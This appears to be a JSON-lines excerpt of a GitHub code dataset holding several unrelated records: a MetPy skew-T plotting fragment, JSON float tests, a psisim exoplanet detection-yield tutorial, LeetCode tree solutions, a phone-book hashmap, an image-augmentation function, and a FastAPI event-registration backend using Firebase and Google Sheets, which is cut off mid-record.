1*units.degK)\n\n(300*units.degK).to('degC')\n\nfig = plt.figure(figsize=(9, 9))\nskew = SkewT(fig, rotation=45)\n\n# Plot the data using normal plotting functions, in this case using\n# log scaling in Y, as dictated by the typical meteorological plot\nskew.plot(p, T, 'r')\nskew.plot(p, Td, 'g')\nskew.plot_barbs(p, u, v)\nskew.ax.set_ylim(1000, 100)\nskew.ax.set_xlim(-40, 60)\n\n# Calculate LCL height and plot as black dot\nlcl_pressure, lcl_temperature = mpcalc.lcl(p[0], T[0], Td[0])\nskew.plot(lcl_pressure, lcl_temperature, 'ko', markerfacecolor='black')\n\n# Calculate full parcel profile and add to plot as black line\nprof = mpcalc.parcel_profile(p, T[0], Td[0]).to('degC')\nskew.plot(p, prof, 'k', linewidth=2)\n\n# Example of coloring area between profiles\ngreater = T >= prof\nskew.ax.fill_betweenx(p, T, prof, where=greater, facecolor='blue', alpha=0.4)\nskew.ax.fill_betweenx(p, T, prof, where=~greater, facecolor='red', alpha=0.4)\n\n# An example of a slanted line at constant T -- in this case the 0\n# isotherm\nskew.ax.axvline(0, color='c', linestyle='--', linewidth=2)\n\n# Add the relevant special lines\nskew.plot_dry_adiabats()\nskew.plot_moist_adiabats()\nskew.plot_mixing_lines()\n\n# Show the plot\nplt.show()\n\nx = [860,960]\ny = [302, 299]\nprint(np.polyfit(x, y, 1))\n\ndef integ(x):\n return -0.015*x*x+327.8*x\n\ninteg(960)-integ(860)\n\nnp.trapz([302,299], [860,960])\n\npint = [959,931.3,925.,899.3,892.,867.9]\ntint = [298.90289633,299.37465065,299.54662685,300.52407484,300.81124879,302.54903507]\nnp.trapz(tint[::-1], pint[::-1])\n\nplt.plot(pint, tint, marker='o')\n\n27349.019918277005/(959-867.9)\n\na= np.array([1,2,3])\n\na\n\nnp.append(a, [4])\n\np.dimensionality\n\np.dimensionality == {'[length]': -1.0, '[mass]': 1.0, '[time]': -2.0}\n\nleng = 1 * units.m\n\nleng\n\nleng.dimensionality \n\nleng.units\n\nfrom time import sleep\n\nfor i in range(10):\n print(i)\n dataset = get_upper_air_data(datetime(1999, 5, 4, 0), 'OUN', retry_delay=1000)\n #sleep(0.01)\n\n\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/Mixed Layer.py","file_name":"Mixed Layer.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25624938141","text":"import decimal\nimport json as py_json\nimport math\nimport platform\n\nimport pytest\nfrom yapic import json as yapic_json\n\nIS32BIT = platform.architecture()[0] == \"32bit\"\n\nCASES = [\n (1.1, \"1.1\"),\n (-1.1, \"-1.1\"),\n (3.14159265359, \"3.14159265359\"),\n (1e100, \"1e+100\"),\n (1e-100, \"1e-100\"),\n (float(\"nan\"), \"NaN\"),\n (float(\"infinity\"), \"Infinity\"),\n (float(\"-infinity\"), \"-Infinity\"),\n]\n\n# rounding error on 32bit machine\nif not IS32BIT:\n CASES.append((89255.0 / 1e22, \"8.9255e-18\"))\n\n\n@pytest.mark.parametrize(\"value,expected\", CASES)\ndef test_float_encode(value, expected, ensure_ascii):\n assert yapic_json.dumps(value, ensure_ascii=ensure_ascii) == expected\n assert yapic_json.dumpb(value, ensure_ascii=ensure_ascii) == expected.encode(\"utf-8\")\n\n\n@pytest.mark.parametrize(\"expected,value\", CASES)\ndef test_float_decode(value, expected, number_input_type):\n if math.isnan(expected):\n assert math.isnan(yapic_json.loads(value))\n else:\n value = number_input_type(value)\n assert yapic_json.loads(value) == py_json.loads(value)\n\n\n@pytest.mark.parametrize(\n \"value\",\n [\n \"12345.34e23\",\n \"12345.34e-2300\",\n \"12345e+2300\",\n \"12345e-2300\",\n \"1.0001\",\n \"-0.0001\",\n \"1.0001e2\",\n \"31415.926535897932\",\n \"[31415.926535897932,314159.26535897932]\",\n \"0.0001e2\",\n \"0.1\",\n \"0.0000\",\n \"[0,0.0]\",\n \"1.00e2\",\n \"0e-2\",\n \"0E-7\",\n ],\n)\ndef test_float_decode2(value, number_input_type):\n value = number_input_type(value)\n assert yapic_json.loads(value) == py_json.loads(value)\n\n\n@pytest.mark.parametrize(\"expected,value\", CASES)\ndef test_float_parse_hook(value, expected, number_input_type):\n if not math.isnan(expected):\n value = number_input_type(value)\n assert yapic_json.loads(value, parse_float=decimal.Decimal) == py_json.loads(value, parse_float=decimal.Decimal)\n","repo_name":"zozzz/yapic.json","sub_path":"tests/test_float.py","file_name":"test_float.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"38"} +{"seq_id":"18973775946","text":"from psisim import telescope,instrument,observation,spectrum,universe,plots\nimport numpy as np\nimport matplotlib.pylab as plt\nimport copy\nimport time\nimport astropy.units as u\nimport os\nimport psisim\n\npsisim_path = os.path.dirname(psisim.__file__)\n\ntmt = telescope.TMT()\npsi_red = instrument.PSI_Red()\npsi_red.set_observing_mode(3600,2,'M',10, np.linspace(4.2,4.8,3)*u.micron) #3600s, 2 exposures,M-band, R of 10\n\n######################################\n######## Generate the universe #######\n######################################\n\nexosims_config_filename = psisim_path+\"/../Tutorials/forBruceandDimitri_EXOCAT1.json\" #Some filename here\nuni = universe.ExoSims_Universe(exosims_config_filename)\nuni.simulate_EXOSIMS_Universe()\n\n##############################\n######## Lots of setup #######\n##############################\n\nmin_iwa = np.min(psi_red.current_wvs).to(u.m)/tmt.diameter*u.rad\nplanet_table = uni.planets\n# planet_table = planet_table[np.where(planet_table['PlanetMass'] > 10)]\nplanet_table = planet_table[planet_table['AngSep'] > min_iwa.to(u.mas)]\nplanet_table = planet_table[planet_table['Flux Ratio'] > 1e-10]\n\nn_planets = len(planet_table)\n\nplanet_types = []\nplanet_spectra = [] #The spectrum from the cooling tracks\nplanet_eq_spectra = [] #The spectrum from the equilibrium thermal emission\nplanet_ages = []\n\nn_planets_now = n_planets\nrand_planets = np.random.randint(0, n_planets, n_planets_now)\n\n########### Model spectrum wavelength choice #############\n# We're going to generate a model spectrum at a resolution twice the \n# requested resolution\nintermediate_R = psi_red.current_R*2\n#Choose the model wavelength range to be just a little bigger than \n#the observation wavelengths\nmodel_wv_low = 0.9*np.min(psi_red.current_wvs) \nmodel_wv_high = 1.1*np.max(psi_red.current_wvs)\n\n#Figure out a good wavelength spacing for the model\nwv_c = 0.5*(model_wv_low+model_wv_high) #Central wavelength of the model\ndwv_c = wv_c/intermediate_R #The delta_lambda at the central wavelength\n#The number of wavelengths to generate. Divide by two for nyquist in the d_wv. \n#Multiply the final number by 2 just to be safe.\nn_model_wv = int((model_wv_high-model_wv_low)/(dwv_c/2))*2\n#Generate the model wavelenths\nmodel_wvs = np.linspace(model_wv_low, model_wv_high, n_model_wv) #Choose some wavelengths\n\n#Let's assume we're doing the AO sensing in I-band: \nplanet_table['StarAOmag'] = planet_table['StarImag']\n\n#####################################\n######## Generate the Spectra #######\n#####################################\n\nprint(\"\\n Starting to generate planet spectra\")\nfor planet in planet_table[rand_planets]:\n #INSERT PLANET SELECTION RULES HERE\n\n if planet['PlanetMass'] < 10:\n #If the planet is < 10 M_Earth, we don't trust bex. So we'll be pessimistic and just report its thermal equilibrium. \n planet_type = \"blackbody\"\n planet_types.append(planet_type)\n\n #The bond albedo\n atmospheric_parameters = 0.5\n planet_spectrum = spectrum.simulate_spectrum(planet, model_wvs, intermediate_R, atmospheric_parameters, package='blackbody')\n planet_spectra.append(planet_spectrum)\n planet_eq_spectra.append(planet_spectrum)\n\n else:\n planet_type = \"Gas\"\n planet_types.append(planet_type)\n\n age = np.random.random() * 5e9 # between 0 and 5 Gyr\n planet_ages.append(age)\n\n time1 = time.time()\n\n ### Here we're going to generate the spectrum as the addition of cooling models and a blackbody (i.e. equilibrium Temperature)\n \t## Generate the spectrum from cooling models and downsample to intermediate resolution\n atmospheric_parameters = age, 'M', True\n planet_spectrum = spectrum.simulate_spectrum(planet, model_wvs, intermediate_R, atmospheric_parameters, package='bex-cooling')\n\n ## Generate the spectrum from a blackbody\n atmospheric_parameters = 0.5#The bond albedo\n planet_eq_spectrum = np.array(spectrum.simulate_spectrum(planet, model_wvs, intermediate_R, atmospheric_parameters, package='blackbody'))\n \n planet_spectra.append(planet_spectrum)\n planet_eq_spectra.append(planet_eq_spectrum)\n \n time2 = time.time()\n print('Spectrum took {0:.3f} s'.format((time2-time1)))\n\nprint(\"Done generating planet spectra\")\nprint(\"\\n Starting to simulate observations\")\n\n#Here we take the biggest of either the planet cooling spectrum or the planet equilibrium spectrum\n#Kind of hacky, but is a good start\nfinal_spectra = np.array(copy.deepcopy(planet_spectra))\nplanet_eq_spectra = np.array(planet_eq_spectra)\nplanet_spectra = np.array(planet_spectra)\nfinal_spectra[planet_eq_spectra > planet_spectra] = planet_eq_spectra[planet_eq_spectra > planet_spectra]\n\n\n##########################################\n######## Simulate the observations #######\n##########################################\n\npost_processing_gain=10\nsim_F_lambda, sim_F_lambda_errs,sim_F_lambda_stellar, noise_components = observation.simulate_observation_set(tmt, psi_red,\n\tplanet_table[rand_planets], final_spectra, model_wvs, intermediate_R, inject_noise=False,\n\tpost_processing_gain=post_processing_gain,return_noise_components=True)\n\nspeckle_noises = np.array([s[0] for s in noise_components])\nphoton_noises = np.array([s[3] for s in noise_components])\n\nflux_ratios = sim_F_lambda/sim_F_lambda_stellar\ndetection_limits = sim_F_lambda_errs/sim_F_lambda_stellar\nsnrs = sim_F_lambda/sim_F_lambda_errs\n\ndetected = psi_red.detect_planets(planet_table[rand_planets],snrs,tmt)\n\n\n########################################\n######## Make the contrast Plot ########\n########################################\n\n#Choose which wavelength you want to plot the detections at:\nwv_index = 1\n\nfig, ax = plots.plot_detected_planet_contrasts(planet_table[rand_planets],wv_index,\n detected,flux_ratios,psi_red,tmt,ymin=1e-8, ymax=1e-1,show=False)\n\n#The user can now adjust the plot as they see fit. \n#e.g. Annotate the plot\n# ax.text(4e-2,1e-5,\"Planets detected: {}\".format(len(np.where(detected[:,wv_index])[0])),color='k')\n# ax.text(4e-2,0.5e-5,\"Planets not detected: {}\".format(len(np.where(~detected[:,wv_index])[0])),color='k')\n# ax.text(4e-2,0.25e-5,\"Post-processing gain: {}\".format(post_processing_gain),color='k')\nprint(\"Planets detected: {}\".format(len(np.where(detected[:,wv_index])[0])))\nprint(\"Planets not detected: {}\".format(len(np.where(~detected[:,wv_index])[0])))\nprint(\"Post-processing gain: {}\".format(post_processing_gain))\nplt.show()\n\n########################################\n######## Make the magnitude Plot #######\n########################################\n\n## Choose which wavelength you want to plot the detections at:\n# wv_index = 1\n\n# fig, ax = plots.plot_detected_planet_magnitudes(planet_table[rand_planets],wv_index,\n# detected,flux_ratios,psi_red,tmt,show=False)\n\n# #The user can now adjust the plot as they see fit. \n# #e.g. Annotate the plot\n# # ax.text(4e-2,1e-5,\"Planets detected: {}\".format(len(np.where(detected[:,wv_index])[0])),color='k')\n# # ax.text(4e-2,0.5e-5,\"Planets not detected: {}\".format(len(np.where(~detected[:,wv_index])[0])),color='k')\n# # ax.text(4e-2,0.25e-5,\"Post-processing gain: {}\".format(post_processing_gain),color='k')\n# print(\"Planets detected: {}\".format(len(np.where(detected[:,wv_index])[0])))\n# print(\"Planets not detected: {}\".format(len(np.where(~detected[:,wv_index])[0])))\n# print(\"Post-processing gain: {}\".format(post_processing_gain))\n# plt.show()\n\n###########################################\n######## Recalculate the magnitudes #######\n###########################################\n\n\n# dMags = -2.5*np.log10(flux_ratios[:,wv_index]) \n\n# band = psi_red.current_filter\n# if band == 'R':\n# bexlabel = 'CousinsR'\n# starlabel = 'StarRmag'\n# elif band == 'I':\n# bexlabel = 'CousinsI'\n# starlabel = 'StarImag'\n# elif band == 'J':\n# bexlabel = 'SPHEREJ'\n# starlabel = 'StarJmag'\n# elif band == 'H':\n# bexlabel = 'SPHEREH'\n# starlabel = 'StarHmag'\n# elif band == 'K':\n# bexlabel = 'SPHEREKs'\n# starlabel = 'StarKmag'\n# elif band == 'L':\n# bexlabel = 'NACOLp'\n# starlabel = 'StarKmag'\n# elif band == 'M':\n# bexlabel = 'NACOMp'\n# starlabel = 'StarKmag'\n# else:\n# raise ValueError(\"Band needs to be 'R', 'I', 'J', 'H', 'K', 'L', 'M'. Got {0}.\".format(band))\n\n# stellar_mags = planet_table[starlabel]\n# stellar_mags = np.array(stellar_mags)\n\n# planet_mag = stellar_mags+dMags\n\n# plt.figure()\n# plt.plot(planet_mag,np.log10(masses),'o',alpha=0.3) \n# plt.xlabel(\"M-band Magnitude\")\n# plt.ylabel(\"Log10(Mass)\")\n# plt.show()\n\n# plt.figure()\n# plt.plot(np.log10(flux_ratios[:,wv_index]),np.log10(masses),'o',alpha=0.3) \n# plt.xlabel(\"log10(Flux Ratios\")\n# plt.ylabel(\"Log10(Mass)\")\n# plt.show()\n\n# sim_F_lambda\n\n# plt.figure()\n# plt.plot((sim_F_lambda[:,wv_index]),np.log10(masses),'o',alpha=0.3) \n# plt.xlabel(\"log10(sim_F_lambda)\")\n# plt.ylabel(\"Log10(Mass)\")\n# plt.xlim(0,1e8)\n# plt.show()\n\n\n############################################################\n######## Histogram of detections and non-detections ########\n############################################################\n\n### And now we'll make a simple histogram of detected vs. generated planet mass. \nmasses = [planet['PlanetMass'] for planet in planet_table]\ndetected_masses = [planet['PlanetMass'] for planet in planet_table[detected[:,1]]] #Picking 4.5 micron\n\nbins = np.logspace(np.log10(1),np.log10(1000),20)\nfig,axes = plt.subplots(2,1)\nhist_detected = axes[0].hist(detected_masses,bins=bins,color='darkturquoise',histtype='step',label=\"Detected\",linewidth=3.5)\nhist_all = axes[0].hist(masses,color='k',bins=bins,histtype='step',label=\"Full Sample\",linewidth=3.5)\naxes[0].set_xscale(\"log\")\naxes[0].set_ylabel(\"Number of planets\")\naxes[0].set_xlabel(r\"Planet Mass [$M_{\\oplus}$]\")\naxes[0].legend()\n\nefficiency = hist_detected[0]/hist_all[0]\nefficiency[efficiency!=efficiency]=0\naxes[1].step(np.append(hist_detected[1][0],hist_detected[1]),np.append(0,np.append(efficiency,0)),where='post',linewidth=3)\naxes[1].set_ylabel(\"Detection Efficiency\")\n#Stupid hack\naxes[1].set_xscale(\"log\")\naxes[1].set_xlabel(r\"Planet Mass [$M_{\\oplus}$]\")\nfig.suptitle(r\"Thermal Emission Detections at {:.1f}$\\mu m$\".format(psi_red.current_wvs[1]))\nplt.show()\n\n##################################\n######## Save the results ########\n##################################\n\nfrom astropy.io import fits\nplanet_table[rand_planets].write(\"thermal_planet_table.csv\")\nps_hdu = fits.PrimaryHDU(planet_spectra)\nps_hdu.writeto(\"thermal_planet_spectra.fits\",overwrite=True)\nflux_hdu = fits.PrimaryHDU([sim_F_lambda, sim_F_lambda_errs,np.array(sim_F_lambda_stellar)])\nflux_hdu.writeto(\"thermal_Observation_set.fits\",overwrite=True)\nnoise_components_hdu = fits.PrimaryHDU(noise_components)\nnoise_components_hdu.writeto(\"thermal_noise_components.fits\",overwrite=True)\n\n","repo_name":"planetarysystemsimager/psisim","sub_path":"Tutorials/example_thermal_yield.py","file_name":"example_thermal_yield.py","file_ext":"py","file_size_in_byte":10834,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"} +{"seq_id":"72441744432","text":"# Definition for a binary tree node.\nfrom typing import List, Optional\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n # 분할정복으로 접근\n def sortedArrayToBST(self, nums: List[int]) -> Optional[TreeNode]:\n def dfs(nums):\n # exit condition\n if not nums:\n return None\n \n # mid node\n middle = len(nums) // 2\n node = TreeNode(nums[middle])\n\n # left\n left = dfs(nums[:middle])\n # right\n right = dfs(nums[middle+1:])\n\n node.left = left\n node.right = right \n\n return node\n\n root = dfs(nums)\n\n return root\n\n # 이진 검색 결과로 트리 구성 -> 책 정답\n def sortedArrayToBST(self, nums: List[int]) -> Optional[TreeNode]:\n if not nums:\n return None\n\n mid = len(nums) // 2\n\n # 분할 정복으로 이진 검색 결과 트리 구성\n node = TreeNode(nums[mid])\n node.left = self.sortedArrayToBST(nums[:mid])\n node.right = self.sortedArrayToBST(nums[mid+1:])\n\n return node\n\nnums = [-10,-3,0,5,9]\nsolution = Solution()\nprint(solution.sortedArrayToBST(nums))","repo_name":"dhtmaks2540/LeetCode-Algorithm","sub_path":"algorithm_problems/convert-sorted-array-to-binary-search-tree-2.py","file_name":"convert-sorted-array-to-binary-search-tree-2.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"35798448196","text":"import sys\n\n\nclass HashMap:\n \"\"\" This is a class for the HashMap data structure built on an arrays \"\"\"\n def __init__(self):\n self.n = None\n self.query = None\n self.arguments = None\n self.PhoneBook = None\n self.a = 34\n self.b = 24\n self.p = 100019\n self.m = 1000\n self.hashkey = None\n\n def read(self):\n self.n = int(sys.stdin.readline())\n self.PhoneBook = [{} for _ in range(self.m)]\n for _ in range(self.n):\n self.query, *self.arguments = sys.stdin.readline().rstrip('\\n').split(' ')\n self.hashkey = (((self.a * int(self.arguments[0]))+self.b) % self.p) % self.m\n if self.query == \"add\":\n self.add()\n elif self.query == \"del\":\n self.delete()\n elif self.query == \"find\":\n self.find()\n\n def add(self):\n self.PhoneBook[self.hashkey][int(self.arguments[0])] = self.arguments[1]\n\n def delete(self):\n if int(self.arguments[0]) in self.PhoneBook[self.hashkey]:\n del self.PhoneBook[self.hashkey][int(self.arguments[0])]\n\n def find(self):\n if int(self.arguments[0]) in self.PhoneBook[self.hashkey]:\n print(self.PhoneBook[self.hashkey][int(self.arguments[0])])\n else:\n print('not found')\n\n\nif __name__ == \"__main__\":\n phone_book = HashMap()\n phone_book.read()","repo_name":"rishittripathi-therocking/Data-Structures-And-Algorithm","sub_path":"Data Structures/phone_book.py","file_name":"phone_book.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"10749017716","text":"# O(N)\n\ndef maxDepth(self, root: Optional[TreeNode]) -> int: \n # check if there is no node\n if root==None:\n return 0\n \n # check if there is 1 node only\n elif root.right==None and root.left==None:\n return 1\n \n \n # Compute the depth of each subtree\n ltree=self.maxDepth(root.left)\n rtree=self.maxDepth(root.right)\n \n # return max height \n return (max(ltree,rtree)+1)","repo_name":"Sameek18/Striver-DSA-sheet","sub_path":"Day18/Height of a Binary Tree.py","file_name":"Height of a Binary Tree.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72911226031","text":"import os\nfrom random import shuffle\n\nimport numpy as np\nimport cv2\nimport tensorflow as tf\n\n# ImageDataGenerator\nimg = cv2.imread('ff4e9adb85e0b62f8b80d67891408ed4.origin.jpg')\n\n\ndef random_swap(image_array, swap_size=(5, 7), swap_range=2, step=1):\n assert swap_range < swap_size[0] * swap_size[1]\n H, W, _ = image_array.shape\n h_point = [int(H / swap_size[0]) * i for i in range(swap_size[0] + 1)]\n h_boxs = [h_point[i:i + 2] for i in range(len(h_point) - 1)]\n w_point = [int(W / swap_size[1]) * i for i in range(swap_size[1] + 1)]\n w_boxs = [w_point[i:i + 2] for i in range(len(w_point) - 1)]\n boxes = [h_box + w_box for h_box in h_boxs for w_box in w_boxs]\n for i in range(0, len(boxes) - swap_range, step):\n temp = boxes[i:i + swap_range]\n shuffle(temp)\n boxes[i:i + swap_range] = temp\n boxes = [boxes[i * swap_size[1]:(i + 1) * swap_size[1]] for i in range(swap_size[0])]\n img = np.concatenate([np.concatenate([image_array[b[0]:b[1], b[2]:b[3], :] for b in box], axis=1) for box in boxes],\n axis=0)\n return img\n\n\nfunc = tf.numpy_function(random_swap, inp=[tf.keras.Input(shape=(None, None, None))], Tout=tf.float32)\nfunc(img)","repo_name":"gfanqi/DCL_tensorflow2","sub_path":"do_some_experiment.py","file_name":"do_some_experiment.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10363524414","text":"from pathlib import Path\nfrom fastapi import FastAPI, HTTPException, UploadFile, Form\nfrom fastapi.responses import JSONResponse\nimport firebase_admin\nfrom firebase_admin import credentials, initialize_app, storage\nfrom google.cloud import firestore\nfrom datetime import datetime, timedelta, timezone\nimport os\nfrom utils import connect, open_worksheet, append_data\nfrom fastapi.routing import APIRouter\nfrom models.events import WorkshopRegistrationRequest, NonWorkshopRegistrationRequest, FileTypeEnum\nfrom models.admin import CategoryEnum, ClassEnum\nfrom dotenv import load_dotenv, dotenv_values\n\nload_dotenv()\nconfig = dotenv_values(\".env\")\nspreadsheet_name = config[\"SPREADSHEET_NAME\"]\naccess_code1 = config[\"ACCESS_CODE1\"]\naccess_code2 = config[\"ACCESS_CODE2\"]\naccess_code3 = config[\"ACCESS_CODE3\"]\n\n# Create a list of access codes\nallowed_access_codes = [access_code1, access_code2, access_code3]\n\n# Create the FastAPI app\napp = FastAPI()\n\n# Create the event_router\nevent_router = APIRouter(tags=[\"Registration\"])\nadmin_router = APIRouter(tags=[\"Admin\"])\nasset_router = APIRouter(tags=[\"Assets\"])\n\nCREDENTIAL_PATH = \"sa.json\"\nBUCKET_NAME = \"icee24\"\n\ncred = credentials.Certificate(CREDENTIAL_PATH)\ninitialize_app(cred)\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = CREDENTIAL_PATH\n\nfirebase_storage = storage.bucket(name=BUCKET_NAME)\ndb = firestore.Client()\n\n@event_router.post(\"/upload-file\")\nasync def upload_file(file: UploadFile, type: FileTypeEnum):\n allowed_formats = {'pdf': 'application/pdf', 'jpeg': 'image/jpeg', 'jpg': 'image/jpeg', 'png': 'image/png'}\n max_file_size = 5 * 1024 * 1024 # 5 MB\n\n try:\n file_format = file.filename.split('.')[-1].lower()\n if file_format not in allowed_formats:\n raise HTTPException(status_code=400, detail=\"Format file tidak didukung\")\n\n file_size = file.file.seek(0, 2)\n if file_size > max_file_size:\n raise HTTPException(status_code=400, detail=\"Ukuran file terlalu besar\")\n\n file.file.seek(0)\n\n current_time = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n new_filename = f\"{current_time}.{file.filename}\"\n\n # Get the content type based on the file format\n content_type = allowed_formats[file_format]\n\n # Construct the destination path with the folder (type) included\n destination_path = f\"registration/{type}/{new_filename}\"\n\n blob = firebase_storage.blob(destination_path) # Use the destination path\n\n # Set the content type when uploading the file\n blob.upload_from_file(file.file, content_type=content_type)\n\n file_url = f\"https://storage.googleapis.com/{firebase_storage.name}/{destination_path}\"\n print(\"fileurl\")\n\n # Create a response dictionary in the specified format\n response_data = {\"status_code\": 200, \"status\": \"success\", \"data\": {\"file_url\": file_url}}\n \n # Return a JSONResponse with the custom response data and status code\n return JSONResponse(content=response_data, status_code=200)\n\n except HTTPException as http_exception:\n # Create a response dictionary for error cases\n response_data = {\"status_code\": http_exception.status_code, \"status\": \"failed\", \"message\": http_exception.detail}\n \n # Return a JSONResponse with the custom error response data and status code\n return JSONResponse(content=response_data, status_code=http_exception.status_code)\n except Exception as e:\n # Create a response dictionary for general exceptions\n response_data = {\"status_code\": 500, \"status\": \"failed\", \"message\": f\"Terjadi kesalahan: {str(e)}\"}\n \n # Return a JSONResponse with the custom error response data and status code\n return JSONResponse(content=response_data, status_code=500)\n\n@event_router.post(\"/workshop\")\nasync def upload_data_workshop(request: WorkshopRegistrationRequest):\n try:\n credentials_file = \"sa.json\"\n\n print(\"connecting spreadsheet\")\n spreadsheet = connect(credentials_file)\n\n worksheet = open_worksheet(spreadsheet, spreadsheet_name, \"workshop\")\n\n # Definisikan zona waktu Asia/Jakarta\n jakarta_timezone = timezone(timedelta(hours=7)) # UTC+7 untuk Asia/Jakarta\n\n # Dapatkan waktu saat ini dalam zona waktu Asia/Jakarta\n current_datetime_wib = datetime.now(jakarta_timezone)\n formatted_datetime = current_datetime_wib.strftime(\"%m/%d/%Y %H:%M:%S\")\n\n data_to_append = [\n formatted_datetime,\n request.full_name,\n request.email,\n request.phone_number,\n request.institution,\n request.profession,\n request.address,\n request.url_bukti_follow\n ]\n\n print(data_to_append)\n\n append_data(worksheet, data_to_append)\n\n # Prepare the response data\n response_data = {\n \"status_code\": 200,\n \"status\": \"success\",\n \"data\": {\n \"formatted_datetime\": formatted_datetime,\n \"full_name\": request.full_name,\n \"email\": request.email,\n \"phone_number\": request.phone_number,\n \"institution\": request.institution,\n \"profession\": request.profession,\n \"address\": request.address,\n \"url_bukti_follow\": request.url_bukti_follow,\n \"row_inserted\": worksheet.row_count\n }\n }\n\n print(response_data)\n\n # Return the response\n return response_data\n\n except Exception as e:\n # Prepare the response for errors\n response_data = {\n \"status_code\": 500,\n \"status\": \"failed\",\n \"data\": {\n \"message\": f\"Terjadi kesalahan: {str(e)}\"\n }\n }\n\n # Return the error response\n return response_data\n\n@event_router.post(\"/conference\")\nasync def upload_data_conference(request: NonWorkshopRegistrationRequest):\n try:\n credentials_file = \"sa.json\"\n\n print(\"connecting spreadsheet\")\n spreadsheet = connect(credentials_file)\n\n worksheet = open_worksheet(spreadsheet, spreadsheet_name, \"workshop\")\n\n # Definisikan zona waktu Asia/Jakarta\n jakarta_timezone = timezone(timedelta(hours=7)) # UTC+7 untuk Asia/Jakarta\n\n # Dapatkan waktu saat ini dalam zona waktu Asia/Jakarta\n current_datetime_wib = datetime.now(jakarta_timezone)\n formatted_datetime = current_datetime_wib.strftime(\"%m/%d/%Y %H:%M:%S\")\n\n data_to_append = [\n formatted_datetime,\n request.full_name,\n request.email,\n request.phone_number,\n request.institution,\n request.profession,\n request.address,\n request.url_bukti_pembayaran\n ]\n\n print(data_to_append)\n\n append_data(worksheet, data_to_append)\n\n response_data = {\n \"status_code\": 200,\n \"status\": \"success\",\n \"data\": {\n \"formatted_datetime\": formatted_datetime,\n \"full_name\": request.full_name,\n \"email\": request.email,\n \"phone_number\": request.phone_number,\n \"institution\": request.institution,\n \"profession\": request.profession,\n \"address\": request.address,\n \"url_bukti_pembayarabn\": request.url_bukti_pembayaran,\n \"row_inserted\": worksheet.row_count\n }\n }\n\n print(response_data)\n\n # Return the response\n return response_data\n\n except Exception as e:\n # Prepare the response for errors\n response_data = {\n \"status_code\": 500,\n \"status\": \"failed\",\n \"data\": {\n \"message\": f\"Terjadi kesalahan: {str(e)}\"\n }\n }\n\n # Return the error response\n return response_data\n\n\n## ADMIN ROUTER\ncontent_types = {\n 'jpeg': 'image/jpeg',\n 'jpg': 'image/jpeg',\n 'png': 'image/png',\n}\n\n@admin_router.post(\"/upload-partner\")\nasync def upload_sponsor(access_code: str, kelas: ClassEnum, category: CategoryEnum, file: UploadFile, nama_sponsor: str):\n allowed_formats = {'jpeg', 'jpg', 'png'}\n max_file_size = 20 * 1024 * 1024\n\n try:\n # Validate the access_code\n if access_code not in allowed_access_codes:\n raise HTTPException(status_code=400, detail=\"Access code is not valid\")\n file_format = file.filename.split('.')[-1].lower()\n if file_format not in allowed_formats:\n raise HTTPException(status_code=400, detail=\"Format file tidak didukung\")\n\n file_size = file.file.seek(0, 2)\n if file_size > max_file_size:\n raise HTTPException(status_code=400, detail=\"Ukuran file terlalu besar\")\n\n file.file.seek(0)\n\n current_time = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n\n # Modify the filename by appending the file format and replacing spaces with underscores\n new_filename = f\"{nama_sponsor.replace(' ', '_')}.{file_format}\"\n\n destination_path = f\"{kelas}/{category}/{new_filename}\"\n\n blob = firebase_storage.blob(destination_path)\n\n # Set the content type based on the file format using a dictionary (content_types)\n\n if file_format in content_types:\n blob.content_type = content_types[file_format]\n\n blob.upload_from_file(file.file)\n\n file_url = f\"https://storage.googleapis.com/{firebase_storage.name}/{destination_path}\"\n\n # Create a new document with an auto-generated ID in the \"partners\" collection\n data = {\n \"name\": nama_sponsor,\n \"category\": kelas,\n \"size\": category,\n \"file_url\": file_url,\n }\n\n db.collection(\"partners\").add(data)\n\n return {\"message\": \"success\", \"file_url\": file_url}\n\n except HTTPException as http_exception:\n return {\"message\": http_exception.detail}\n except Exception as e:\n return {\"message\": f\"Terjadi kesalahan: {str(e)}\"}\n\n@admin_router.get(\"/all-partner-name\")\nasync def get_all_partner_names():\n try:\n # Query Firestore to get all documents in the \"partners\" collection\n query = db.collection(\"partners\").stream()\n\n partner_names = []\n\n for doc in query:\n data = doc.to_dict()\n partner_name = data.get(\"name\")\n if partner_name:\n partner_names.append(partner_name)\n\n return partner_names\n\n except Exception as e:\n raise HTTPException(status_code=500, detail=f\"Terjadi kesalahan: {str(e)}\")\n\n@admin_router.get(\"/partner-detail/\")\nasync def get_partner_detail(partner_name: str):\n try:\n # Query Firestore to find a document with the specified partner name\n query = db.collection(\"partners\").where(\"name\", \"==\", partner_name).stream()\n\n partner_detail = None\n\n for doc in query:\n partner_detail = doc.to_dict()\n break # Assuming there is only one partner with the given name\n\n if partner_detail:\n return partner_detail\n else:\n raise HTTPException(status_code=404, detail=\"Partner not found\")\n\n except Exception as e:\n raise HTTPException(status_code=500, detail=f\"Terjadi kesalahan: {str(e)}\")\n\n@admin_router.delete(\"/delete-partner/\")\nasync def delete_partner(access_code:str, partner_name: str):\n try:\n # Validate the access_code\n if access_code not in allowed_access_codes:\n raise HTTPException(status_code=400, detail=\"Access code is not valid\")\n # Query Firestore to find a document with the specified partner name\n query = db.collection(\"partners\").where(\"name\", \"==\", partner_name).stream()\n\n for doc in query:\n # Delete the document with the matching partner name\n doc.reference.delete()\n return {\"message\": f\"Partner '{partner_name}' deleted 